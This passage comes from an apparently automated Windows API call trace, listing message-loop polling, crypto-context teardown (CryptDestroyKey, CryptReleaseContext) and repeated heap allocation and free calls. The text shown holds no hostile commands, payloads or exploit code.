lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.075] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.075] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.075] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.075] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.075] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.080] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 1 [0043.080] TranslateMessage (lpMsg=0x6aed6c) returned 0 [0043.080] DispatchMessageW (lpMsg=0x6aed6c) returned 0x0 [0043.080] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae408) returned 1 [0043.080] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0043.080] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0043.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.083] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.084] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.084] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.084] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.084] CryptDestroyKey (hKey=0x7c2200) returned 1 [0043.084] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.084] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.084] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.084] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.084] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.084] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.084] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.084] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.084] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.084] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.085] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.085] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.085] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.085] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.085] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.085] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.085] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.085] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.085] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.085] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.086] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.086] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0043.086] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.086] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.086] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.087] CloseHandle (hObject=0x128) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0043.087] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0043.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0043.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8895c8 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889970 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.088] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.088] CloseHandle (hObject=0x140) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.089] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0043.090] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.090] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0043.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0043.091] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.092] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | 